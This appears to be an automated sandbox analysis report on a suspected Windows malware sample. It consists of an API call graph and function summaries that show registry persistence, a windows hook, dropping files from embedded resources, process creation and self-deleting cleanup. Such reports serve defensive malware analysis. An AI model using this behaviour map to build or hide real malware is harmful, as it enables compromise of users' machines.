___initmbctable _fast_error_exit 13281->13285 13284 42cab8 ___initmbctable 13282->13284 13283->13281 13283->13285 13284->13216 13286 42ca00 MultiByteToWideChar 13285->13286 13288 42af1a __lock 36 API calls 13285->13288 13287 42ca1b 13286->13287 13286->13292 13289 42ca40 13287->13289 13290 42ca20 WideCharToMultiByte 13287->13290 13291 42c9ea 13288->13291 13293 42ca45 WideCharToMultiByte 13289->13293 13294 42ca5b 13289->13294 13290->13292 13291->13280 13291->13286 13292->13279 13292->13280 13293->13292 13293->13294 13295 42af1a __lock 36 API calls 13294->13295 13296 42ca63 13295->13296 13296->13292 13297 42ca6c WideCharToMultiByte 13296->13297 13297->13292 13298 42ca80 13297->13298 13299 4255be ___free_lc_time 36 API calls 13298->13299 13299->13292 13301 426f68 __lock 36 API calls 13300->13301 13302 4259c7 13301->13302 13305 4259d7 13302->13305 13307 427a79 13302->13307 13306 425a05 13305->13306 13315 427871 13305->13315 13306->13270 13308 427a85 ___initmbctable 13307->13308 13309 42758b __lock 36 API calls 13308->13309 13310 427a8c 13309->13310 13319 4279b8 13310->13319 13314 427aa2 ___initmbctable 13314->13305 13316 42788f 13315->13316 13318 427886 13315->13318 13317 42b56a ___initmbctable 50 API calls 13316->13317 13317->13318 13318->13305 13320 426f68 __lock 36 API calls 13319->13320 13322 4279be 13320->13322 13321 427a73 13324 427aab 13321->13324 13322->13321 13323 4278e8 ___initmbctable 36 API calls 13322->13323 13323->13321 13325 4274d6 ___free_lc_time LeaveCriticalSection 13324->13325 13326 427ab2 13325->13326 13326->13314 13327->13190 13572 421d50 13328->13572 13330 413b08 13330->13082 13332 412336 13331->13332 13333 41234c SetFilePointer ReadFile CloseHandle 13331->13333 13334 424873 _fast_error_exit 36 API calls 13332->13334 13335 424873 _fast_error_exit 36 API calls 13333->13335 13336 412345 13334->13336 13337 412399 13335->13337 13336->13099 13337->13099 13798 40c1d0 GetTickCount GetTickCount GetTickCount GetTickCount 13338->13798 13340 41266b 
GetProcessHeap HeapAlloc 13341 4126f5 6 API calls 13340->13341 13344 412690 13340->13344 13346 424873 _fast_error_exit 36 API calls 13341->13346 13342 4126af CreateFileA WriteFile CloseHandle GetProcessHeap HeapFree 13342->13341 13344->13342 13799 40c1d0 GetTickCount GetTickCount GetTickCount GetTickCount 13344->13799 13347 4129ad 13346->13347 13347->13112 13349 412a92 13348->13349 13349->13349 13350 412aa6 ExpandEnvironmentStringsA CreateFileA 13349->13350 13351 412af3 ReadFile CloseHandle 13350->13351 13352 412add 13350->13352 13353 424873 _fast_error_exit 36 API calls 13351->13353 13354 424873 _fast_error_exit 36 API calls 13352->13354 13356 412b21 13353->13356 13355 412aec 13354->13355 13355->13092 13356->13092 13358 41c710 13357->13358 13358->13358 13359 41c72a LoadLibraryA 13358->13359 13360 41c740 13359->13360 13361 41c756 13359->13361 13362 424873 _fast_error_exit 36 API calls 13360->13362 13364 41c7f9 GetProcAddress 13361->13364 13363 41c74f 13362->13363 13363->13100 13365 41c828 GetProcAddress 13364->13365 13366 41c80f 13364->13366 13365->13366 13367 41c86c GetProcAddress 13365->13367 13368 424873 _fast_error_exit 36 API calls 13366->13368 13367->13366 13369 41c8d4 13367->13369 13370 41c821 13368->13370 13371 41c99f GetProcAddress 13369->13371 13370->13100 13371->13366 13372 41c9b3 13371->13372 13373 41ca22 GetProcAddress 13372->13373 13373->13366 13374 41ca36 GetProcAddress 13373->13374 13374->13366 13375 41ca8e GetProcAddress 13374->13375 13375->13366 13376 41cace GetProcAddress 13375->13376 13376->13366 13378 41cbc1 GetProcAddress 13376->13378 13378->13366 13379 41cc21 GetProcAddress 13378->13379 13379->13366 13381 41cce4 GetProcAddress 13379->13381 13381->13366 13383 41cd7c GetProcAddress 13381->13383 13383->13366 13385 41ce75 13383->13385 13386 41cf19 GetProcAddress 13385->13386 13386->13366 13387 41cf2d GetProcAddress 13386->13387 13387->13366 13389 41cfb0 13387->13389 13390 41d030 GetProcAddress 13389->13390 13390->13366 13391 41d044 GetProcAddress 
13390->13391 13391->13366 13393 41d1bc 13391->13393 13394 41d285 GetProcAddress 13393->13394 13394->13366 13395 41d299 GetProcAddress 13394->13395 13395->13366 13396 41d2f1 GetProcAddress 13395->13396 13396->13366 13397 41d349 GetProcAddress 13396->13397 13397->13366 13399 41d4b2 13397->13399 13400 41d53b LoadLibraryA 13399->13400 13401 41ddc9 13400->13401 13402 41d54d GetProcAddress 13400->13402 13403 424873 _fast_error_exit 36 API calls 13401->13403 13402->13366 13406 41d646 GetProcAddress 13402->13406 13404 41ddd9 13403->13404 13404->13100 13406->13366 13408 41d6b0 GetProcAddress 13406->13408 13408->13366 13410 41d727 GetProcAddress 13408->13410 13410->13366 13412 41d819 13410->13412 13413 41d962 GetProcAddress 13412->13413 13413->13366 13414 41d976 LoadLibraryA 13413->13414 13414->13401 13416 41da0d GetProcAddress 13414->13416 13416->13366 13418 41da96 13416->13418 13419 41db5b GetProcAddress 13418->13419 13419->13366 13420 41db6f 13419->13420 13421 41dc13 LoadLibraryA 13420->13421 13421->13366 13422 41dc23 13421->13422 13423 41dcd9 GetProcAddress 13422->13423 13423->13366 13424 41dced 13423->13424 13425 41ddb4 GetProcAddress 13424->13425 13425->13401 13800 421ec0 13426->13800 13429 421d50 153 API calls 13430 413adf SetEvent SetEvent SetEvent SetEvent SetEvent 13429->13430 13430->13110 13844 412c90 13432->13844 13434 412fd7 13435 413260 13434->13435 13437 4131d4 GetModuleFileNameA lstrcatA RegOpenKeyExA 13434->13437 13436 424873 _fast_error_exit 36 API calls 13435->13436 13438 41326c 13436->13438 13437->13435 13439 413215 lstrlenA RegSetValueExA RegCloseKey 13437->13439 13440 4120c0 13438->13440 13439->13435 13441 412193 13440->13441 13441->13441 13442 4121a7 ExpandEnvironmentStringsA GetFileAttributesA 13441->13442 13443 41223b LoadLibraryA 13442->13443 13444 41220a 13442->13444 13446 412293 GetProcAddress 13443->13446 13447 412272 13443->13447 13856 41e0b0 13444->13856 13450 4122d8 13446->13450 13449 424873 _fast_error_exit 36 API calls 13447->13449 13448 
412230 13448->13443 13448->13450 13451 41228c 13449->13451 13452 424873 _fast_error_exit 36 API calls 13450->13452 13451->13119 13453 4122e6 13452->13453 13453->13119 13871 41aa30 13454->13871 13456 413e01 13878 416660 CreateMutexA 13456->13878 13458 413e18 13879 4046e0 13458->13879 13460 413e29 13882 40b540 13460->13882 13464 413e4f 13465 413e68 13464->13465 13466 413e5d Sleep 13464->13466 13467 413e7f 13465->13467 13468 413ece 13465->13468 13466->13465 13916 408ad0 13467->13916 13470 413ef6 13468->13470 13471 413edc CreateThread 13468->13471 13933 401830 13470->13933 13473 413efb 13471->13473 15229 401960 13471->15229 13472 413e93 13922 404590 CloseHandle 13472->13922 13938 413b70 13473->13938 13477 413ea4 13925 416690 CloseHandle 13477->13925 13480 4122f0 41 API calls 13481 413f13 13480->13481 13950 416760 13481->13950 13482 413eb5 13926 41a8f0 CloseHandle 13482->13926 13485 413f3a 13953 40b300 13485->13953 13486 424873 _fast_error_exit 36 API calls 13487 415051 13486->13487 13525 412b30 13487->13525 13490 40b300 78 API calls 13491 4142c7 13490->13491 13492 40b300 78 API calls 13491->13492 13493 4144f5 13492->13493 13494 40b300 78 API calls 13493->13494 13495 414691 13494->13495 13496 40b300 78 API calls 13495->13496 13497 414875 13496->13497 13498 40b300 78 API calls 13497->13498 13499 414974 13498->13499 13500 40b300 78 API calls 13499->13500 13501 414b1e 13500->13501 13502 40b300 78 API calls 13501->13502 13503 414c6a 13502->13503 13504 40b300 78 API calls 13503->13504 13505 414e20 CreateEventA CreateThread 13504->13505 13506 414f72 13505->13506 13507 414e88 13505->13507 15185 401260 13505->15185 13508 414f83 WaitForSingleObject CloseHandle 13506->13508 13509 414fa8 WaitForSingleObject CloseHandle 13506->13509 13988 4123a0 GetModuleFileNameA 13507->13988 13508->13509 14022 416790 13509->14022 13524 413ec9 13524->13486 13526 412c02 13525->13526 13526->13526 13527 412c16 ExpandEnvironmentStringsA GetLocalTime CreateFileA WriteFile CloseHandle 13526->13527 13528 
424873 _fast_error_exit 36 API calls 13527->13528 13529 412c7c 13528->13529 13530 413280 13529->13530 13531 413400 13530->13531 13531->13531 13532 41340e RegOpenKeyA 13531->13532 13533 413462 GetModuleFileNameA MoveFileExA 13532->13533 13534 41342a RegDeleteValueA RegCloseKey 13532->13534 13535 413550 13533->13535 13534->13533 13535->13535 13536 413564 ExpandEnvironmentStringsA DeleteFileA 13535->13536 13537 413690 13536->13537 13537->13537 13538 4136aa ExpandEnvironmentStringsA DeleteFileA 13537->13538 13539 4137c2 13538->13539 13539->13539 13540 4137dc ExpandEnvironmentStringsA DeleteFileA 13539->13540 13541 413801 MoveFileExA 13540->13541 13542 41380e ExpandEnvironmentStringsA DeleteFileA 13540->13542 13541->13542 13544 4139a0 13542->13544 13544->13544 13545 4139b4 ExpandEnvironmentStringsA DeleteFileA 13544->13545 13546 413a80 13545->13546 13546->13546 13547 413a94 ExpandEnvironmentStringsA DeleteFileA 13546->13547 13548 424873 _fast_error_exit 36 API calls 13547->13548 13549 413ac1 13548->13549 13550 41ef50 ResetEvent 13549->13550 13573 421d64 13572->13573 13574 421d5d 13572->13574 13704 41f8e0 13573->13704 13574->13330 13576 421d6c 13593 41fd50 13576->13593 13582 421d87 13630 4210d0 13582->13630 13590 421dab 13750 41f250 13590->13750 13594 420050 13593->13594 13595 4201a0 GetProcessHeap HeapAlloc RegOpenKeyExA 13594->13595 13596 420256 RegQueryValueExA 13595->13596 13597 420248 GetLastError 13595->13597 13598 420290 GetLastError 13596->13598 13599 42029e 13596->13599 13597->13596 13616 42036a 13598->13616 13761 425a4d 13599->13761 13603 4202f1 13607 425a4d 36 API calls 13603->13607 13604 4203b4 13774 41f100 CreateEventA 13604->13774 13605 4259c0 ___initmbctable 50 API calls 13605->13603 13608 42031e 13607->13608 13612 4259c0 ___initmbctable 50 API calls 13608->13612 13614 42032b 13608->13614 13609 4203c4 GetProcessHeap HeapFree RegCloseKey 13610 424873 _fast_error_exit 36 API calls 13609->13610 13611 4203f4 13610->13611 13618 420400 13611->13618 13612->13614 
13613 425a4d 36 API calls 13615 42035d 13613->13615 13614->13613 13615->13616 13617 4259c0 ___initmbctable 50 API calls 13615->13617 13766 41f020 OpenSCManagerA 13616->13766 13617->13616 13619 4204d6 13618->13619 13629 420555 13619->13629 13779 41efa0 OpenSCManagerA 13619->13779 13621 42051b 13622 41efa0 7 API calls 13621->13622 13624 42052b 13622->13624 13623 424873 _fast_error_exit 36 API calls 13625 420566 13623->13625 13626 41f020 11 API calls 13624->13626 13729 420570 13625->13729 13627 420540 13626->13627 13628 41f020 11 API calls 13627->13628 13628->13629 13629->13623 13631 421240 GetProcessHeap HeapAlloc RegOpenKeyExA 13630->13631 13633 4214bb GetLastError 13631->13633 13634 4214c9 13631->13634 13633->13634 13635 41f020 11 API calls 13634->13635 13636 421505 13635->13636 13637 41f100 5 API calls 13636->13637 13638 421518 GetProcessHeap HeapFree RegCloseKey 13637->13638 13639 424873 _fast_error_exit 36 API calls 13638->13639 13640 421544 13639->13640 13641 421550 13640->13641 13642 421710 13641->13642 13642->13642 13643 4217ee GetProcessHeap HeapAlloc RegOpenKeyExA 13642->13643 13644 421890 RegQueryValueExA 13643->13644 13645 421888 GetLastError 13643->13645 13646 4218b0 GetLastError 13644->13646 13647 4218bd 13644->13647 13645->13644 13648 421944 13646->13648 13649 425a4d 36 API calls 13647->13649 13650 41f020 11 API calls 13648->13650 13651 4218c8 13649->13651 13653 4219a2 13650->13653 13652 4218d5 13651->13652 13654 4259c0 ___initmbctable 50 API calls 13651->13654 13656 425a4d 36 API calls 13652->13656 13655 41f100 5 API calls 13653->13655 13654->13652 13657 4219b5 GetProcessHeap HeapFree RegCloseKey 13655->13657 13658 4218e9 13656->13658 13659 424873 _fast_error_exit 36 API calls 13657->13659 13660 4218f6 13658->13660 13662 4259c0 ___initmbctable 50 API calls 13658->13662 13661 421a0a 13659->13661 13663 425a4d 36 API calls 13660->13663 13666 421a20 13661->13666 13662->13660 13664 421937 13663->13664 13664->13648 13665 4259c0 ___initmbctable 50 API calls 
13664->13665 13665->13648 13667 421b30 13666->13667 13667->13667 13668 421ba4 GetProcessHeap HeapAlloc RegOpenKeyExA 13667->13668 13669 421c60 RegQueryValueExA 13668->13669 13670 421c58 GetLastError 13668->13670 13671 421c81 GetLastError 13669->13671 13672 421c8b 13669->13672 13670->13669 13687 421ce7 13671->13687 13673 425a4d 36 API calls 13672->13673 13674 421c96 13673->13674 13676 421ca3 13674->13676 13678 4259c0 ___initmbctable 50 API calls 13674->13678 13675 41f020 11 API calls 13677 421d17 GetProcessHeap HeapFree RegCloseKey 13675->13677 13680 425a4d 36 API calls 13676->13680 13679 424873 _fast_error_exit 36 API calls 13677->13679 13678->13676 13681 421d43 13679->13681 13682 421cb8 13680->13682 13689 41f660 13681->13689 13683 4259c0 ___initmbctable 50 API calls 13682->13683 13685 421cc5 13682->13685 13683->13685 13684 425a4d 36 API calls 13686 421cda 13684->13686 13685->13684 13686->13687 13688 4259c0 ___initmbctable 50 API calls 13686->13688 13687->13675 13688->13687 13690 41f773 13689->13690 13690->13690 13691 41f796 13690->13691 13694 41f7a7 13690->13694 13692 424873 _fast_error_exit 36 API calls 13691->13692 13695 41f7a3 13692->13695 13693 41f7b4 LoadLibraryA 13696 41f7df 13693->13696 13697 41f7c9 GetProcAddress 13693->13697 13694->13693 13694->13696 13695->13590 13699 424873 _fast_error_exit 36 API calls 13696->13699 13697->13696 13698 41f7f0 SetWindowsHookExA 13697->13698 13701 41f80c 13698->13701 13700 41f7ec 13699->13700 13700->13590 13702 424873 _fast_error_exit 36 API calls 13701->13702 13703 41f821 13702->13703 13703->13590 13705 41fa16 13704->13705 13706 41fb79 GetProcessHeap HeapAlloc RegOpenKeyExA 13705->13706 13707 41fc24 GetLastError 13706->13707 13708 41fc29 RegQueryValueExA 13706->13708 13707->13708 13709 41fc51 13708->13709 13710 41fc4a GetLastError 13708->13710 13711 425a4d 36 API calls 13709->13711 13727 41fca7 13710->13727 13712 41fc5c 13711->13712 13714 41fc69 13712->13714 13717 4259c0 ___initmbctable 50 API calls 13712->13717 13713 
41f020 11 API calls 13715 41fccd 13713->13715 13716 425a4d 36 API calls 13714->13716 13718 41f100 5 API calls 13715->13718 13720 41fc7b 13716->13720 13717->13714 13719 41fcdd GetProcessHeap HeapFree RegCloseKey 13718->13719 13721 424873 _fast_error_exit 36 API calls 13719->13721 13722 41fc88 13720->13722 13724 4259c0 ___initmbctable 50 API calls 13720->13724 13723 41fd45 13721->13723 13725 425a4d 36 API calls 13722->13725 13723->13576 13724->13722 13726 41fc9a 13725->13726 13726->13727 13728 4259c0 ___initmbctable 50 API calls 13726->13728 13727->13713 13728->13727 13730 420730 13729->13730 13731 420e34 GetProcessHeap HeapAlloc RegOpenKeyExA 13730->13731 13732 420f00 13731->13732 13733 420ef1 GetLastError 13731->13733 13734 420f04 RegQueryValueExA 13732->13734 13733->13734 13735 420f32 13734->13735 13736 420f27 GetLastError 13734->13736 13737 420f40 RegCloseKey RegOpenKeyExA 13735->13737 13736->13737 13738 420f60 GetLastError 13737->13738 13739 420f69 RegQueryValueExA 13737->13739 13738->13739 13740 420f92 GetLastError 13739->13740 13741 420fa7 13739->13741 13743 420fc2 13740->13743 13784 42cfce 13741->13784 13744 41f020 11 API calls 13743->13744 13745 42107e 13744->13745 13746 41f100 5 API calls 13745->13746 13747 42108e GetProcessHeap HeapFree RegCloseKey 13746->13747 13748 424873 _fast_error_exit 36 API calls 13747->13748 13749 4210c4 13748->13749 13749->13582 13751 41f327 13750->13751 13751->13751 13752 41f50e GetProcessHeap HeapAlloc GetSystemDirectoryA 13751->13752 13753 41f550 13752->13753 13754 41f631 GetProcessHeap HeapFree 13753->13754 13755 41f5e6 13753->13755 13756 41f5cf CreateEventA 13753->13756 13757 424873 _fast_error_exit 36 API calls 13754->13757 13755->13754 13758 41f5f0 CreateProcessA 13755->13758 13756->13755 13759 41f652 13757->13759 13758->13754 13760 41f613 CloseHandle CloseHandle 13758->13760 13759->13330 13760->13754 13762 426f68 __lock 36 API calls 13761->13762 13763 425a66 13762->13763 13764 424873 _fast_error_exit 36 API calls 
13763->13764 13765 4202e4 13764->13765 13765->13603 13765->13605 13767 41f039 GetLastError 13766->13767 13768 41f04e OpenServiceA 13766->13768 13767->13604 13769 41f080 QueryServiceStatusEx 13768->13769 13770 41f063 GetLastError CloseServiceHandle 13768->13770 13771 41f099 GetLastError CloseServiceHandle CloseServiceHandle 13769->13771 13772 41f0bb CloseServiceHandle CloseServiceHandle 13769->13772 13770->13604 13771->13604 13773 41f0d0 13772->13773 13773->13604 13775 41f11d GetLastError 13774->13775 13776 41f12f WaitForSingleObject 13774->13776 13775->13609 13777 41f140 CloseHandle 13776->13777 13778 41f159 CloseHandle 13776->13778 13777->13609 13778->13609 13780 41efb6 GetLastError 13779->13780 13781 41efc8 OpenServiceA 13779->13781 13780->13621 13782 41eff3 CloseServiceHandle CloseServiceHandle 13781->13782 13783 41efda GetLastError CloseServiceHandle 13781->13783 13782->13621 13783->13621 13785 42cfda ___initmbctable 13784->13785 13786 426f68 __lock 36 API calls 13785->13786 13787 42cfe4 13786->13787 13788 42cff7 13787->13788 13789 427a79 ___initmbctable 36 API calls 13787->13789 13790 42a027 ___initmbctable 61 API calls 13788->13790 13791 42d003 ___initmbctable 13788->13791 13789->13788 13792 42d042 _fast_error_exit 13790->13792 13791->13743 13792->13791 13793 4263b4 __getbuf 36 API calls 13792->13793 13795 42d08f 13792->13795 13793->13795 13794 42a027 ___initmbctable 61 API calls 13796 42d0b8 _strcat 13794->13796 13795->13794 13795->13796 13796->13791 13797 4255be ___free_lc_time 36 API calls 13796->13797 13797->13791 13798->13340 13799->13344 13801 421f87 GetSystemDirectoryA 13800->13801 13803 422130 GetFileAttributesA 13801->13803 13805 422296 GetFileAttributesA 13803->13805 13806 42227f 13803->13806 13808 4222a2 13805->13808 13809 4222b6 GetFileAttributesA 13805->13809 13820 421e40 13806->13820 13811 421e40 7 API calls 13808->13811 13812 4222c5 13809->13812 13813 4222d9 13809->13813 13810 422293 13810->13805 13814 4222b3 13811->13814 13815 421e40 7 API 
calls 13812->13815 13827 4223a0 13813->13827 13814->13809 13815->13813 13817 4222e1 13818 424873 _fast_error_exit 36 API calls 13817->13818 13819 413ad5 13818->13819 13819->13429 13839 421de0 FindResourceA 13820->13839 13822 421e5c 13823 421e63 13822->13823 13824 421e67 CreateFileA 13822->13824 13823->13810 13825 421e91 WriteFile CloseHandle 13824->13825 13826 421e87 13824->13826 13825->13810 13826->13810 13828 422461 13827->13828 13828->13828 13829 4227e4 GetProcessHeap HeapAlloc RegOpenKeyExA RegQueryValueExA 13828->13829 13830 422848 RegCloseKey 13829->13830 13833 42286b 13829->13833 13831 424873 _fast_error_exit 36 API calls 13830->13831 13832 422864 13831->13832 13832->13817 13833->13833 13834 4228c9 RegSetValueExA 13833->13834 13835 4228eb RegCloseKey GetProcessHeap HeapFree 13834->13835 13836 4228e9 13834->13836 13837 424873 _fast_error_exit 36 API calls 13835->13837 13836->13835 13838 422917 13837->13838 13838->13817 13840 421e00 LoadResource 13839->13840 13841 421dfd 13839->13841 13842 421e15 SizeofResource LockResource 13840->13842 13843 421e0f 13840->13843 13841->13822 13842->13843 13843->13822 13845 412e80 13844->13845 13845->13845 13846 412ea4 RegOpenKeyExA 13845->13846 13847 412fa5 13846->13847 13848 412ec8 RegQueryValueExA 13846->13848 13849 424873 _fast_error_exit 36 API calls 13847->13849 13852 412f83 RegCloseKey 13848->13852 13853 412f7e 13848->13853 13850 412fb4 13849->13850 13850->13434 13854 424873 _fast_error_exit 36 API calls 13852->13854 13853->13852 13855 412f9e 13854->13855 13855->13434 13869 41dde0 13856->13869 13859 41e107 13859->13448 13860 41e10d LoadResource 13861 41e123 SizeofResource LockResource 13860->13861 13862 41e11c 13860->13862 13863 41e143 CreateFileA 13861->13863 13864 41e13b 13861->13864 13862->13448 13865 41e19b WriteFile 13863->13865 13866 41e18b 13863->13866 13864->13448 13865->13866 13867 41e240 13866->13867 13868 41e239 CloseHandle 13866->13868 13867->13448 13868->13867 13870 41de01 FindResourceA 13869->13870 

Control-flow Graph

• Executed
• Not Executed
Strings
Memory Dump Source
• Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_document.jbxd
Similarity
                                                                  • API ID:
                                                                  • String ID: $ $#$&$'$($($)$*$0$5$6$8$A$B$F$G$H$I$L$M$N$O$P$S$T$Z$^$`$c$e$f$i$i$l$p$p$q$q$t$v$v$w(B${$~
                                                                  • API String ID: 0-3106658521
                                                                  • Opcode ID: 7ffee0a367cd91da12548a0672ee88ef15d007f6f0e5a8efa2edde75e2af7312
                                                                  • Instruction ID: b9ab1dd3182530b11e39c15e962d93472a180878fd51d4fd0559e01a76d35aec
                                                                  • Opcode Fuzzy Hash: 7ffee0a367cd91da12548a0672ee88ef15d007f6f0e5a8efa2edde75e2af7312
                                                                  • Instruction Fuzzy Hash: 9EE1D32110D7C189D322DB7C945868FBFD05BA7228F581A9DF1E45B3E3C2A98249C76B

Control-flow Graph (graph image not recoverable; legend: Executed / Not Executed; covers 423260-4237da)
APIs
• GetProcessHeap.KERNEL32 ref: 0042329F
• HeapAlloc.KERNEL32(00000000,00000008,00000014), ref: 004232B2
• HeapAlloc.KERNEL32(00000000,00000008,00001000,00000000), ref: 004232DC
• HeapFree.KERNEL32(00000000,00000000,?), ref: 004232EB
Memory Dump Source
• Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_document.jbxd
Similarity
• API ID: Heap$Alloc$FreeProcess
• String ID:
• API String ID: 4128259342-0
• Opcode ID: 8f0c75df61baccf555039c07e55f9e7a4c47b3d129244f42066f45807613cd4b
• Instruction ID: cabeeef3d48c1ccb1133837745078946395a36f2d94fb2f40b145150ed7ea3f1
• Opcode Fuzzy Hash: 8f0c75df61baccf555039c07e55f9e7a4c47b3d129244f42066f45807613cd4b
• Instruction Fuzzy Hash: 27F1BC70204354ABD310DF25DC41F6B7BE9EB89700F44492DF984DB290DBB9EA05CB6A

Control-flow Graph (graph image not recoverable; legend: Executed / Not Executed; covers 41f660-41f824)
APIs
• LoadLibraryA.KERNELBASE(00000000), ref: 0041F7B9
• GetProcAddress.KERNEL32(00000000,00000043), ref: 0041F7CF
• SetWindowsHookExA.USER32(00000005,00000000,00000000,00000000), ref: 0041F7FC
Strings
Memory Dump Source
• Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_document.jbxd
Similarity
• API ID: AddressHookLibraryLoadProcWindows
• String ID: "$'$)$;$A$B$C$E$N$P$P$S$c$h$o$r
• API String ID: 2564493370-1035779198
• Opcode ID: 00a429360f83fa20652cea882935d05cc92ee5958ea3b9dd59ca4227aa40c6aa
• Instruction ID: d6bcc57e59aaaf67e7ff94e30ae49016207e17142ead068d2604868bf6eb43c5
• Opcode Fuzzy Hash: 00a429360f83fa20652cea882935d05cc92ee5958ea3b9dd59ca4227aa40c6aa
• Instruction Fuzzy Hash: D6514B2520C3C19AD311DB39984478BBFD15FA6318F484AADF0E9873D2D3A9C54AC76B

Control-flow Graph (graph image not recoverable; legend: Executed / Not Executed; covers 425d91-425f65)
APIs
• GetVersionExA.KERNEL32(?,0042E598,00000060), ref: 00425DB1
• GetModuleHandleA.KERNEL32(00000000,?,0042E598,00000060), ref: 00425E04
• _fast_error_exit.LIBCMT ref: 00425E66
• _fast_error_exit.LIBCMT ref: 00425E77
• GetCommandLineA.KERNEL32(?,0042E598,00000060), ref: 00425E96
• GetStartupInfoA.KERNEL32(?), ref: 00425EEA
• __wincmdln.LIBCMT ref: 00425EF0
• GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00425F0D
Memory Dump Source
• Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_document.jbxd
Similarity
• API ID: HandleModule_fast_error_exit$CommandInfoLineStartupVersion__wincmdln
• String ID:
• API String ID: 3897392166-0
• Opcode ID: 3b144cdf6a657c3d277f1513a7a37946c3bbd038f07daa96f711f80a89638c8d
• Instruction ID: fff0b790c7a0d9b16c0474446a89fef60bd80b9f406c56c5ed212da1009f27c5
• Opcode Fuzzy Hash: 3b144cdf6a657c3d277f1513a7a37946c3bbd038f07daa96f711f80a89638c8d
• Instruction Fuzzy Hash: 8A41B470B40B30CBDB20AB76FC0566E76A0AF04714FA5443FF9149A291DB7D8942CB9D

Control-flow Graph (graph image not recoverable)

Strings
Memory Dump Source
• Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
